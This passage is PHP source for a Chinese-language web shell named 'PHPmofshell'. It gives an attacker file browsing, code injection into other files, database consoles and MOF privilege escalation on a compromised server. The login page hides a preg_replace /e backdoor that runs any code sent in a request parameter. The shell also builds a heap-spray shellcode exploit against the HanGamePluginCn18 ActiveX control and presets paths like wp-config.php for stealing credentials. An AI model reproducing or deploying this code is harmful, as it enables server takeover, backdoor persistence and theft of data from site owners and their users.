                            do_write($files, "ab", "\n" . $code) ? html_n("\xb3\xc9\xb9\xa6--> {$files}<br>") : html_n("\xca\xa7\xb0\xdc--> {$files}<br>");
                        }
                        break;
                    case "qingma":
                        $filecode = @file_get_contents($files);
                        if (stristr($filecode, $code)) {
                            $newcode = str_replace($code, '', $filecode);
                            do_write($files, "wb", $newcode) ? html_n("\xb3\xc9\xb9\xa6--> {$files}<br>") : html_n("\xca\xa7\xb0\xdc--> {$files}<br>");
                        }
                        break;
                    case "tihuan":
                        $filecode = @file_get_contents($files);
                        if (stristr($filecode, $code)) {
                            $newcode = str_replace($code, $filetype, $filecode);
                            do_write($files, "wb", $newcode) ? html_n("\xb3\xc9\xb9\xa6--> {$files}<br>") : html_n("\xca\xa7\xb0\xdc--> {$files}<br>");
                        }
                        break;
                    case "scanfile":
                        $file = explode('/', $files);
                        if (stristr($file[count($file) - 1], $code)) {
                            html_a("?eanver=editr&p={$files}", $files);
                            echo "<br>";
                        }
                        break;
                    case "scancode":
                        $filecode = @file_get_contents($files);
                        if (stristr($filecode, $code)) {
                            html_a("?eanver=editr&p={$files}", $files);
                            echo "<br>";
                        }
                        break;
                    case "scanphp":
                        $fileinfo = pathinfo($files);
                        if ($fileinfo['extension'] == $code) {
                            $filecode = @file_get_contents($files);
                            if (muma($filecode, $code)) {
                                html_a("?eanver=editr&p=" . urlencode($files), "\xb1\xe0\xbc\xad");
                                html_a("?eanver=del&p=" . urlencode($files), "\xc9\xbe\xb3\xfd");
                                echo $files . '<br>';
                            }
                        }
                        break;
                }
            }
        }
    }
    class PHPzip
    {
        var $file_count = 0;
        var $datastr_len = 0;
        var $dirstr_len = 0;
        var $filedata = '';
        var $gzfilename;
        var $fp;
        var $dirstr = '';
        function unix2DosTime($unixtime = 0)
        {
            $timearray = $unixtime == 0 ? getdate() : getdate($unixtime);
            if ($timearray['year'] < 1980) {
                $timearray['year'] = 1980;
                $timearray['mon'] = 1;
                $timearray['mday'] = 1;
                $timearray['hours'] = 0;
                $timearray['minutes'] = 0;
                $timearray['seconds'] = 0;
            }
            return $timearray['year'] - 1980 << 25 | $timearray['mon'] << 21 | $timearray['mday'] << 16 | $timearray['hours'] << 11 | $timearray['minutes'] << 5 | $timearray['seconds'] >> 1;
        }
        function startfile($path = 'QQqun555227.zip')
        {
            $this->gzfilename = $path;
            $mypathdir = array();
            do {
                $mypathdir[] = $path = dirname($path);
            } while ($path != '.');
            @end($mypathdir);
            do {
                $path = @current($mypathdir);
                @mkdir($path);
            } while (@prev($mypathdir));
            if ($this->fp = @fopen($this->gzfilename, "w")) {
                return true;
            }
            return false;
        }
        function addfile($data, $name)
        {
            $name = str_replace('\\', '/', $name);
            if (strrchr($name, '/') == '/') {
                return $this->adddir($name);
            }
            $dtime = dechex($this->unix2DosTime());
            $hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x' . $dtime[2] . $dtime[3] . '\\x' . $dtime[0] . $dtime[1];
            eval('$hexdtime = "' . $hexdtime . '";');
            $unc_len = strlen($data);
            $crc = crc32($data);
            $zdata = gzcompress($data);
            $c_len = strlen($zdata);
            $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
            $datastr = "PK\x03\x04";
            $datastr = "PK\x03\x04\x14\x00";
            $datastr = "PK\x03\x04\x14\x00\x00\x00";
            $datastr = "PK\x03\x04\x14\x00\x00\x00\x08\x00";
            $datastr .= $hexdtime;
            $datastr .= pack('V', $crc);
            $datastr .= pack('V', $c_len);
            $datastr .= pack('V', $unc_len);
            $datastr .= pack('v', strlen($name));
            $datastr .= pack('v', 0);
            $datastr .= $name;
            $datastr .= $zdata;
            $datastr .= pack('V', $crc);
            $datastr .= pack('V', $c_len);
            $datastr .= pack('V', $unc_len);
            fwrite($this->fp, $datastr);
            $my_datastr_len = strlen($datastr);
            unset($datastr);
            $dirstr = "PK\x01\x02";
            $dirstr = "PK\x01\x02\x00\x00";
            $dirstr = "PK\x01\x02\x00\x00\x14\x00";
            $dirstr = "PK\x01\x02\x00\x00\x14\x00\x00\x00";
            $dirstr = "PK\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00";
            $dirstr .= $hexdtime;
            $dirstr .= pack('V', $crc);
            $dirstr .= pack('V', $c_len);
            $dirstr .= pack('V', $unc_len);
            // uncompressed filesize
            $dirstr .= pack('v', strlen($name));
            // length of filename
            $dirstr .= pack('v', 0);
            // extra field length
            $dirstr .= pack('v', 0);
            // file comment length
            $dirstr .= pack('v', 0);
            // disk number start
            $dirstr .= pack('v', 0);
            // internal file attributes
            $dirstr .= pack('V', 32);
            // external file attributes - 'archive' bit set
            $dirstr .= pack('V', $this->datastr_len);
            // relative offset of local header
            $dirstr .= $name;
            $this->dirstr .= $dirstr;
            //Ŀ¼��Ϣ
            $this->file_count++;
            $this->dirstr_len += strlen($dirstr);
            $this->datastr_len += $my_datastr_len;
        }
        function adddir($name)
        {
            $name = str_replace("\\", "/", $name);
            $datastr = "PK\x03\x04\n\x00\x00\x00\x00\x00\x00\x00\x00\x00";
            $datastr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
            $datastr .= pack("v", 0) . $name . pack("V", 0) . pack("V", 0) . pack("V", 0);
            fwrite($this->fp, $datastr);
            $my_datastr_len = strlen($datastr);
            unset($datastr);
            $dirstr = "PK\x01\x02\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00";
            $dirstr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
            $dirstr .= pack("v", 0) . pack("v", 0) . pack("v", 0) . pack("v", 0);
            $dirstr .= pack("V", 16) . pack("V", $this->datastr_len) . $name;
            $this->dirstr .= $dirstr;
            $this->file_count++;
            $this->dirstr_len += strlen($dirstr);
            $this->datastr_len += $my_datastr_len;
        }
        function createfile()
        {
            $endstr = "PK\x05\x06\x00\x00\x00\x00" . pack('v', $this->file_count) . pack('v', $this->file_count) . pack('V', $this->dirstr_len) . pack('V', $this->datastr_len) . "\x00\x00";
            fwrite($this->fp, $this->dirstr . $endstr);
            fclose($this->fp);
        }
    }
    function start_unzip($tmp_name, $new_name, $todir = 'zipfile')
    {
        $zip = new ZipArchive();
        if ($zip->open($tmp_name) !== TRUE) {
            echo "\xb1\xa7\xc7\xb8\xa3\xa1\xd1\xb9\xcb\xf5\xb0\xfc\xce\xde\xb7\xa8\xb4\xf2\xbf\xaa\xbb\xf2\xcb\xf0\xbb\xb5";
        }
        $zip->extractTo($todir);
        $zip->close();
        echo '��ѹ��ϣ�&nbsp;&nbsp;&nbsp;<a href="?eanver=main&path=' . urlencode($todir) . '">�����ѹĿ¼</a>&nbsp;&nbsp;&nbsp;<a href="javascript:history.go(-1);">����</a>';
    }
    function muma($filecode, $filetype)
    {
        $dim = array("php" => array("eval(", "exec("), "asp" => array("WScript.Shell", "execute(", "createtextfile("), "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"), "jsp" => array("runtime.exec("));
        foreach ($dim[$filetype] as $code) {
            if (stristr($filecode, $code)) {
                return true;
            }
        }
    }
    function debug($file, $ftype)
    {
        $type = explode('|', $ftype);
        foreach ($type as $i) {
            if (stristr($file, $i)) {
                return true;
            }
        }
    }
    /*---string---*/
    function str_path($path)
    {
        return str_replace('//', '/', $path);
    }
    function msg($msg)
    {
        die("<script>window.alert('" . $msg . "');history.go(-1);</script>");
    }
    function uppath($nowpath)
    {
        $nowpath = str_replace('\\', '/', dirname($nowpath));
        return urlencode($nowpath);
    }
    function xxstr($key)
    {
        $temp = str_replace("\\\\", "\\", $key);
        $temp = str_replace("\\", "\\\\", $temp);
        return $temp;
    }
    /*---html---*/
    function html_ta($url, $name)
    {
        html_n("<a href=\"{$url}\" target=\"_blank\">{$name}</a>");
    }
    function html_a($url, $name, $where = '')
    {
        html_n("<a href=\"{$url}\" {$where}>{$name}</a> ");
    }
    function html_img($url)
    {
        html_n("<img src=\"?img={$url}\" border=0>");
    }
    function back()
    {
        html_n("<input type='button' value='\xb7\xb5\xbb\xd8' onclick='history.back();'>");
    }
    function html_radio($namei, $namet, $v1, $v2)
    {
        html_n('<input type="radio" name="return" value="' . $v1 . '" checked>' . $namei);
        html_n('<input type="radio" name="return" value="' . $v2 . '">' . $namet . '<br><br>');
    }
    function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
    {
        if ($mode) {
            html_n("<input type=\"{$type}\" name=\"{$name}\" value=\"{$value}\" size=\"{$size}\" checked>{$text}");
        } else {
            html_n("{$text} <input type=\"{$type}\" name=\"{$name}\" value=\"{$value}\" size=\"{$size}\">");
        }
    }
    function html_base()
    {
        html_n('function base64encode(str){
	var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    var out, i, len;
    var c1, c2, c3;
    len = str.length;
    i = 0;
    out = "";
    while (i < len) {
        c1 = str.charCodeAt(i++) & 0xff;
        if (i == len) {
            out += base64EncodeChars.charAt(c1 >> 2);
            out += base64EncodeChars.charAt((c1 & 0x3) << 4);
            out += "==";
            break;
        }
        c2 = str.charCodeAt(i++);
        if (i == len) {
            out += base64EncodeChars.charAt(c1 >> 2);
            out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
            out += base64EncodeChars.charAt((c2 & 0xF) << 2);
            out += "=";
            break;
        }
        c3 = str.charCodeAt(i++);
        out += base64EncodeChars.charAt(c1 >> 2);
        out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
        out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
        out += base64EncodeChars.charAt(c3 & 0x3F);
    }
    return out;
}');
    }
    function html_text($name, $cols, $rows, $value = '')
    {
        html_n("<br><br><textarea name=\"{$name}\" COLS=\"{$cols}\" ROWS=\"{$rows}\" >{$value}</textarea>");
    }
    function html_select($array, $mode = '', $change = '', $name = 'class')
    {
        html_n("<select name={$name} {$change}>");
        foreach ($array as $name => $value) {
            if ($name == $mode) {
                html_n("<option value=\"{$name}\" selected>{$value}</option>");
            } else {
                html_n("<option value=\"{$name}\">{$value}</option>");
            }
        }
        html_n("</select>");
    }
    function html_font($color, $size, $name)
    {
        html_n("<font color=\"{$color}\" size=\"{$size}\">{$name}</font>");
    }
    function GetHtml($url)
    {
        $c = '';
        $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
        if (function_exists('fsockopen')) {
            $link = parse_url($url);
            $query = $link['path'] . '?' . $link['query'];
            $host = strtolower($link['host']);
            $port = $link['port'];
            if ($port == "") {
                $port = 80;
            }
            $fp = fsockopen($host, $port, $errno, $errstr, 10);
            if ($fp) {
                $out = "GET /{$query} HTTP/1.0\r\n";
                $out .= "Host: {$host}\r\n";
                $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
                $out .= "Connection: Close\r\n\r\n";
                fwrite($fp, $out);
                $inheader = 1;
                while (!feof($fp)) {
                    $line = fgets($fp, 4096);
                    if ($inheader == 0) {
                        $contents .= $line;
                    }
                    if ($inheader && ($line == "\n" || $line == "\r\n")) {
                        $inheader = 0;
                    }
                }
                fclose($fp);
                $c = $contents;
            }
        }
        if (empty($c) && function_exists('curl_init') && function_exists('curl_exec')) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_TIMEOUT, 15);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
            $c = curl_exec($ch);
            curl_close($ch);
        }
        if (empty($c) && ini_get('allow_url_fopen')) {
            $c = file_get_contents($url);
        }
        if (empty($c)) {
            echo "document.write('<DIV style=\\'CURSOR:url(\"{$url}\")\\'>');";
        }
        if (!empty($c)) {
            return $c;
        }
    }
    function html_main($path, $shellname)
    {
        if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
            $safemode = TRUE;
            $hsafemode = "<font color=red>ON (\xb0\xb2\xc8\xab)</font>";
        } else {
            $safemode = FALSE;
            $hsafemode = "<font color=green>OFF (\xb2\xbb\xb0\xb2\xc8\xab)</font>";
        }
        $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
        $Server_OS = PHP_OS;
        $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
        $web_server = php_uname();
        print <<<END
<html><title>{$Server_IP} -PHP_mofshell By{$shellname}- {$Server_OS} - {$Server_Soft}</title>
<table width='100%'><tr><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'>\xb5\xd8\xd6\xb7:<input name='path' style='width:90%' value='{$path}'>&nbsp<input name='Submit' type='submit' value='\xcc\xf8\xb5\xbd'> <input type='submit' value='\xcb\xa2\xd0\xc2' onclick='main.location.reload()'></td></tr><tr align='center'><td><b>\xb0\xb2\xc8\xab\xc4\xa3\xca\xbd:{$hsafemode}----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}</b></td></tr><tr align='center'><td></td></tr></form></table>
END;
        html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>");
        html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>");
        html_n("</iframe></td></tr></table></html>");
    }
    function islogin($shellname, $myurl)
    {
        $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
        $Server_OS = PHP_OS;
        $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
        $web_server = php_uname();
        print <<<END
<!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>{$Server_IP}-PHPmofshell By:{$shellname}</title>
<style type="text/css">
body{background-color:#000;}
input,select,textarea{font-size: 12px;background-color:#dddddd;border:1px solid #fff}
body,div{font-size: 20px;color:#ddd;}
</style>
</head>
<body scroll=no><div align="center">
<span style="color: #676767;font-family: Tahoma, Geneva, sans-serif;font-size:12px;">
 <b>{$Server_OS}______{$Server_Soft}______{$web_server}</b>

</div>
<div align="center" style="margin-right:70px; margin-bottom:400px;">
<br><br><br><br><form method='post'>PASS\xa3\xba<input name='envlpass' type='password' size='20'> <input type='submit' value='\xb5\xc7\xc2\xbd'></form><br><br>
</div>
<center>[<font color="red">+</font>] \xb9\xfa\xb2\xfaPHP SHELL\xa3\xac\xd6\xa7\xb3\xd6mof\xcb\xab\xd7\xe9\xbd\xa8\xcc\xe1\xc8\xa8,2003\xbb\xb7\xbe\xb3\xb2\xe2\xca\xd4\xcd\xa8\xb9\xfd<br />[<font color="red">+</font>] \xc7\xeb\xb5\xc7\xc2\xbd\xba\xf3\xca\xb9\xd3\xc3<br />[<font color="red">+</font>] \xc7\xeb\xce\xf0\xd3\xc3\xd3\xda\xb7\xc7\xb7\xa8\xd3\xc3\xcd\xbe\xa3\xac\xb7\xf1\xd4\xf2\xba\xf3\xb9\xfb\xd7\xd4\xb8\xba\xa1\xa3<br />[<font color="green">+</font>] caidaome_SHELL 2018.01.01<br />
</center></span>
<body>
</html>
END;
        @preg_replace("/[_]/e", $_REQUEST['h'], "__");
    }
    function html_sql()
    {
        html_input("text", "sqlhost", "localhost", "<br>MYSQL\xb5\xd8\xd6\xb7", "30");
        html_input("text", "sqlport", "3306", "<br>MYSQL\xb6\xcb\xbf\xda", "30");
        html_input("text", "sqluser", "root", "<br>MYSQL\xd3\xc3\xbb\xa7", "30");
        html_input("password", "sqlpass", "", "<br>MYSQL\xc3\xdc\xc2\xeb", "30");
        html_input("text", "sqldb", "dbname", "<br>MYSQL\xbf\xe2\xc3\xfb", "30");
        html_input("submit", "sqllogin", "\xb5\xc7\xc2\xbd", "<br>");
        html_n('</form>');
    }
    function Mysql_Len($data, $len)
    {
        if (strlen($data) < $len) {
            return $data;
        }
        return substr_replace($data, '...', $len);
    }
    function html_n($data)
    {
        echo "{$data}\n";
    }
    /*---css---*/
    function css_img($img)
    {
        $images = array("exe" => "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqtxhIAOw==", "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "txt" => "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJSArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7UpPWG3Ig6Hq/XmRjuZwkAAA7", "html" => "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNzc////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3PKIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDkBkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIRADs=", "js" => "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibHk0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhsa00AjYYBbc/o9HjNniUAADs=", "xml" => "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACAgDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICxOAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQIQA7", "mp3" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANUaGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fcIGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "img" => "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEciCi8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftdFxEAOw==", "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGULI8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7", "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE//xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+bOHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIICaNOmRcjVj02tPxPCzfkvIAA7");
        header('Content-type: image/gif');
        echo base64_decode($images[$img]);
        die;
    }
    function css_showimg($file)
    {
        $it = substr($file, -3);
        switch ($it) {
            case "jpg":
            case "gif":
            case "bmp":
            case "png":
            case "ico":
                return "img";
            case "htm":
            case "tml":
                return "html";
            case "exe":
            case "com":
                return "exe";
            case "xml":
            case "doc":
                return "xml";
            case ".js":
            case "vbs":
                return "js";
            case "mp3":
            case "wma":
            case "wav":
            case "swf":
            case ".rm":
            case "avi":
            case "mp4":
            case "mvb":
                return "mp3";
            case "rar":
            case "tar":
            case ".gz":
            case "zip":
            case "iso":
                return "rar";
            default:
                return "txt";
        }
    }
    function css_js($num, $code = '')
    {
        if ($num == "shellcode") {
            return '<%@ LANGUAGE="JavaScript" %>
		<%
		var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
		var shellcode = unescape("' . $code . '");
		var bigblock = unescape("%u9090%u9090");
		var headersize = 20;
		var slackspace = headersize+shellcode.length;
		while (bigblock.length<slackspace) bigblock+=bigblock;
		fillblock = bigblock.substring(0, slackspace);
		block = bigblock.substring(0, bigblock.length-slackspace);
		while(block.length+slackspace<0x40000) block = block+block+fillblock;
		memory = new Array();
		for (x=0; x<300; x++) memory[x] = block + shellcode;
		var buffer = "";
		while (buffer.length < 1319) buffer+="A";
		buffer=buffer+"\\x0a\\x0a\\x0a\\x0a"+buffer;
		act.hgs_startNotify(buffer);
		%>';
        }
        html_n('<script language="javascript">');
        if ($num == "1") {
            html_n('	function rusurechk(msg,url){
		smsg = "FileName:[" + msg + "]\\nPlease Input New File:";
		re = prompt(smsg,msg);
		if (re){
			url = url + re;
			window.location = url;
		}
	}
	function rusuredel(msg,url){
		smsg = "Do You Suer Delete [" + msg + "] ?";
		if(confirm(smsg)){
			URL = url + msg;
			window.location = url;
		} 
	}
	function Delok(msg,gourl)
	{
		smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
		if(confirm(smsg))
		{
			if(gourl == \'b\')
			{
				document.getElementById(\'actall\').value = escape(gourl);
				document.getElementById(\'fileall\').submit();
			}
			else window.location = gourl;
		}
	}
	function CheckAll(form)
	{
		for(var i=0;i<form.elements.length;i++)
		{
			var e = form.elements[i];
			if (e.name != \'chkall\')
			e.checked = form.chkall.checked;
		}
	}
	function CheckDate(msg,gourl)
	{
		smsg = "��ǰ�ļ�ʱ��:[" + msg + "]";
		re = prompt(smsg,msg);
		if(re)
		{
			var url = gourl + re;
			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
			var r = re.match(reg);
			if(r==null){alert(\'���ڸ�ʽ���ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\');return false;}
			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
		}
	}
	function SubmitUrl(msg,txt,actid)
	{
		re = prompt(msg,unescape(txt));
		if(re)
		{
			document.getElementById(\'actall\').value = actid;
			document.getElementById(\'inver\').value = escape(re);
			document.getElementById(\'fileall\').submit();
		}
	}');
        } elseif ($num == "2") {
            html_n('var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
	var txt, i, found;
	if(str == "")return false;
	if(NS4){
		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
		if(n == 0) alert(str + " ... Not-Find")
	}
	if(IE4){
		txt = win.document.body.createTextRange();
		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
			txt.moveStart("character", 1);
			txt.moveEnd("textedit")
		}
		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
	}
	return false
}
function CheckDate(){
	var re = document.getElementById(\'mtime\').value;
	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
	var r = re.match(reg);
	if(r==null){alert(\'���ڸ�ʽ���ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\');return false;}
	else{document.getElementById(\'editor\').submit();}
}');
        } elseif ($num == "3") {
            html_n('function Full(i){
   if(i==0 || i==5){
     return false;
   }
  Str = new Array(12);  
	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";
	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
	Str[4] = "Provider=MSDAORA.1;Password=����;User ID=�ʺ�;Data Source=�����;Persist Security Info=True;";
	Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
	Str[8] = "DELETE FROM [TableName] WHERE ID=100";
	Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
	Str[11] = "DROP TABLE [TableName]";
	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
	if(i<=4){
	  DbForm.string.value = Str[i];
  }else{
  	DbForm.sql.value = Str[i];
  }
  return true;
  }');
        } elseif ($num == "4") {
            html_n('function Fulll(i){
   if(i==0){
     return false;
   }
  Str = new Array(8);  
	Str[1] = "config.inc.php";
	Str[2] = "config.inc.php";
	Str[3] = "config_base.php";
	Str[4] = "config.inc.php";
	Str[5] = "config.php";
	Str[6] = "wp-config.php";
	Str[7] = "config.php";
	Str[8] = "mysql.php";
	sform.code.value = Str[i];
  return true;
  }');
        }
        html_n('</script>');
    }
    function css_left()
    {
        html_n('<style type="text/css">
	.menu{width:140px;margin-left:auto;margin-right:auto;}
	.menu dl{margin-top:2px;}
	.menu dl dt{top left repeat-x;}
	.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:140px;display:block;color:#FFFFFF;font-weight:bold;
	text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
	.menu dl dt a:hover{color:#dddddd;}
	.menu dl dd ul{list-style:none;}
	.menu dl dd ul li a{color:#9f9f9f;height:21px;widows:140px;display:block;line-height:21px;text-indent:22px;
	background:#202020 no-repeat 13px 11px;border-color:#202020 #202020 #202020 #202020;margin-top:2px;
	border-style:solid;border-width:1px;}
	.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;}
	</STYLE>');
        html_n('<script language="javascript">
	function getObject(objectId){
	 if(document.getElementById && document.getElementById(objectId)) {
	 return document.getElementById(objectId);
	 }
	 else if (document.all && document.all(objectId)) {
	 return document.all(objectId);
	 }
	 else if (document.layers && document.layers[objectId]) {
	 return document.layers[objectId];
	 }
	 else {
	 return false;
	 }
	}
	function showHide(objname){
	  var obj = getObject(objname);
	    if(obj.style.display == "none"){
			obj.style.display = "block";
		}else{
			obj.style.display = "none";
		}
	}
	</script><div class="menu">');
    }
    function css_main()
    {
        html_n('<style type="text/css">
	*{padding:0px;margin:0px;}
